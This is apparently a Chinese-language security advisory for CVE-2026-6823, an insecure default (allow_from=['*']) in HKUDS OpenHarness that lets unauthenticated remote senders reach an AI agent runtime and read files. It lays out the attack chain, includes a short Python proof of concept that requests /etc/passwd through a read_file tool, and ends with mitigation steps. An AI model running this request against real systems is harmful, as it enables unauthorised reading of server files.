CVE-2026-6823 CVSS 8.2 高危

CVE-2026-6823 HKUDS OpenHarness不安全默认配置漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6823

漏洞类型

不安全的默认配置

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

HKUDS OpenHarness

漏洞概述

HKUDS OpenHarness在PR #147修复前的版本中存在不安全的默认配置漏洞。由于远程通道继承allow_from=["*"]，允许任意远程发送者通过准入检查。攻击者可绕过访问控制，到达主机支持的代理运行时，利用默认启用的只读工具获取未授权的文件读取权限，导致敏感信息泄露。

技术细节

该漏洞的根源在于HKUDS OpenHarness在处理远程通道配置时采用了不安全的默认策略。在受影响版本中，远程通道默认继承了allow_from = ["*"]的权限设置，意味着系统完全信任任意来源的连接请求，缺乏对发送者身份或源地址的有效验证。攻击者可以利用这一配置缺陷，在无需认证且无用户交互的情况下，通过网络向目标通道发送特制请求。由于准入检查机制被绕过，攻击者能够成功连接并控制主机后端的代理运行时。结合系统默认启用的只读工具，攻击者可进一步利用该通道执行文件读取操作，窃取服务器上的敏感数据，造成严重的信息泄露风险。

攻击链分析

STEP 1

步骤1：信息收集

识别网络上运行HKUDS OpenHarness的目标实例及其远程通道端点。

STEP 2

步骤2：发起攻击

利用默认配置 allow_from=["*"]，直接向目标远程通道发送包含恶意指令的请求。

STEP 3

步骤3：绕过访问控制

由于准入检查机制未限制来源，请求成功通过并到达主机后端的代理运行时。

STEP 4

步骤4：数据窃取

调用默认启用的只读工具（如文件读取工具），获取服务器上的敏感文件内容。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Conceptual PoC for CVE-2026-6823
# This script demonstrates connecting to a vulnerable OpenHarness instance
# and exploiting the insecure default configuration to read files.

TARGET_URL = "http://target-openharness-instance:port/remote-channel-endpoint"

def exploit():
    # 1. Prepare payload to interact with the agent runtime
    # Since allow_from is ["*"], no specific authentication header is needed.
    payload = {
        "tool": "read_file",  # Assuming a default read-only tool exists
        "args": {
            "path": "/etc/passwd"  # Sensitive file to read
        }
    }

    try:
        # 2. Send request to the remote channel
        response = requests.post(TARGET_URL, json=payload)

        # 3. Check if the access control was bypassed successfully
        if response.status_code == 200:
            print("[+] Exploit successful! Access control bypassed.")
            print("[+] File content retrieved:")
            print(response.text)
        else:
            print("[-] Exploit failed or target patched.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit()

影响范围

HKUDS OpenHarness < v0.1.7

防御指南

临时缓解措施

在未升级前，应立即检查OpenHarness的配置文件，手动将远程通道的allow_from参数修改为具体的可信IP地址列表，而非通配符*，并重启服务使配置生效。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表